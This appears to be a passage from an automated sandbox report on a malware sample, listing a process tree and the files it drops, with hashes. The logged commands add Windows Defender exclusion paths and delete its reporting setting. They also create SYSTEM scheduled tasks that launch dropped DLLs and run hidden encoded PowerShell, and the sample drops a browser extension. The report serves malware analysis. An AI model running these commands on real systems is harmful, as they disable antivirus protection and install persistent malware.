                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:4824
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:3464
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:2564
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1232
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5064
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1012
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        PID:4972
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1132
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2692
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uqeRQcQeSVSWnHVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:3928
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uqeRQcQeSVSWnHVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4696
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3008
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2108
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4324
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:3096
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RZfGRCgJsrDIEOco /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2552
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RZfGRCgJsrDIEOco /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1744
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /CREATE /TN "gbEkeprHs" /SC once /ST 02:21:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:424
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /run /I /tn "gbEkeprHs"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1296
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /DELETE /F /TN "gbEkeprHs"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2692
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /CREATE /TN "YsLxjqvMZrWymyIEG" /SC once /ST 01:00:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\WvvqjhM.exe\" s7 /gFsite_idpbw 385118 /S" /V1 /F
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:4040
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /run /I /tn "YsLxjqvMZrWymyIEG"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3560
                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2780
                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:352
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:560
                                                                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:4680
                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3176
                                                                                                                                                                                • \??\c:\windows\system32\gpscript.exe
                                                                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:1316
                                                                                                                                                                                  • C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\WvvqjhM.exe
                                                                                                                                                                                    C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\WvvqjhM.exe s7 /gFsite_idpbw 385118 /S
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                                                    • Drops desktop.ini file(s)
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                    PID:2552
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /DELETE /F /TN "bwKBwqZYjkqxftWshF"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5072
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4536
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2916
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4340
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4392
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KCGdmeQdU\tQIJpO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SMPpzaSdDqsJvHF" /V1 /F
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:2212
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                schtasks /CREATE /TN "SMPpzaSdDqsJvHF2" /F /xml "C:\Program Files (x86)\KCGdmeQdU\qzQQpMr.xml" /RU "SYSTEM"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:220
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                schtasks /END /TN "SMPpzaSdDqsJvHF"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2144
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /DELETE /F /TN "SMPpzaSdDqsJvHF"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2776
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TN "znrIDUvoucqewg" /F /xml "C:\Program Files (x86)\IoHaAJhEDYhU2\fqhmiWI.xml" /RU "SYSTEM"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:4396
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TN "KVEvoYrDZKLqM2" /F /xml "C:\ProgramData\uqeRQcQeSVSWnHVB\IqVVNEF.xml" /RU "SYSTEM"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:3364
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TN "RHUfDusjVndeEILcZ2" /F /xml "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\UqwNxxt.xml" /RU "SYSTEM"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:3744
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1316
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "BxzpJXegsLHBOSWsuyU2" /F /xml "C:\Program Files (x86)\FohpjzYDshfCC\skRIrpI.xml" /RU "SYSTEM"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:3464
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "EtrQGzrpWMpnyWxNE" /SC once /ST 01:54:41 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RZfGRCgJsrDIEOco\GqABjEHf\xpsTNTc.dll\",#1 /Obsite_idbxT 385118" /V1 /F
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:2700
                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:2900
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /run /I /tn "EtrQGzrpWMpnyWxNE"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:520
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4704
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4032
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:3296
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:3120
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "YsLxjqvMZrWymyIEG"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:1136
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2584
                                                                                                                                                                                                              • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                c:\windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\GqABjEHf\xpsTNTc.dll",#1 /Obsite_idbxT 385118
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:688
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\GqABjEHf\xpsTNTc.dll",#1 /Obsite_idbxT 385118
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                    PID:860
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /DELETE /F /TN "EtrQGzrpWMpnyWxNE"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:4332
                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:4936

                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1.4MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      c21044b1def34f14e058f28e998694d1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      f43b0157aa7766c60bded1f5193c5800337388c0

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      7152f23398dbc1cbe210287ac88f1028d2f8fa01b62ebcb2f0865ff086e5d6f8

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      87ec13bd4f6b27ad7736afebe3a0d54ed0519d557977ea4bc4344a4404e1d8fd9c5e4641740ac376457a61ef436a794c16cfc556fbeb31e42278bf4cafc1a014

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1bfe591a4fe3d91b03cdf26eaacd8f89

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      719c37c320f518ac168c86723724891950911cea

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      302B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      660cceef730d417fc8f0e97f78db45f8

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      036215c88b8d70f1cae0a65c7d2e0b45a0a7e751

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      405e01bfa3a39803de46929585521f525b0968fba37b2c06868dc55b5eadb160

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      511251582950cc81a3805caa9942ef1b50f0b781cd7a675584134bf75ccf09b9087ac1547d40bdf1639db652597d15c218138174e49df443d132d783057469eb

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      187B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      150B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      8e9f850c55bfb4f2523f292f267c0e03

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      8d204f9164169244e3f11eb4a41c02ffa1e38d1b

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      3c04786f13df7e7646cb4e5cac1d08c5e0c120eb9c9f716b6c322631a71cbc13

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      76261ac2e7e7445ded0928faeddf6a14b68090505469d583a0e621f59e4bfed02f079fafccbc34249ae7ce9bbac47c8b2f5e95da44c39aafc1430450e183f9c4

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      db01a2c1c7e70b2b038edf8ad5ad9826

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      540217c647a73bad8d8a79e3a0f3998b5abd199b

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      19KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      905c01318b00a28aa67f18655e3eef7b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      ac9d21f582e645eedc35e2fc934be339b5ebe04e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      4fd365c5482eee41d24fbd9cb4bfecb43849a7b16b8f877d668f535a681bb42f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      9f1081e806d61704030b1eb29ff4caecc76f6cfb1bb40107644837c2c79cd7c3994d2b74860fb61f7a7096a123c4b2ce06efa071cf83d2ea29a5201ac66eed81

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      18KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6a9869f01c38eebf5e4b2cfb7c421de1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      77412ef1b914d4c0ff8657924eedc546329b217e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      266c5a7fb1df6913e16166e68ff7a0c55ac8dbf72379f27bb1faa4c0f69f9a82

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      f3c2f4dcc411b87a85efea1eb4b303ff3bb85c5e64f515a6bc9421e68ec0f906bd05f9d199ed0b5b49da043df97de55d906ed05fd429b94deffb2e915d52264b

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\iNiYbTHs1Lq4Du24QcHKlJFg.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      693KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1eaf0101ddd3a9660b7b994f0e3b5462

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      3c2518eb987039bff67c39e588e0778e0d964675

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      2a6b664ad1e1760c5d6e7368605313bbf74a078d533e46e6d081ca772bdd4262

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      a347f0595b337b45e42e0b947f30e0f432cc9df401d059c9f5f0157d232900758a62018ba02a7cdb6b6b634fc385d2582b2342c0a9292466afe9dfe7ae4775ad

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040355221\additional_file0.tmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      c0fda03372ae2e7db57616dfd3cb3680

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      59e0c4a92122c8823c1d5fa13a701140ac0a0149

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      b3a48ff577ef09a8fd3b87bb1b36f70ff0078e9e8b1c9e3d34ecb296014d1cdd

                                                                                                                                                                                                                      SHA512

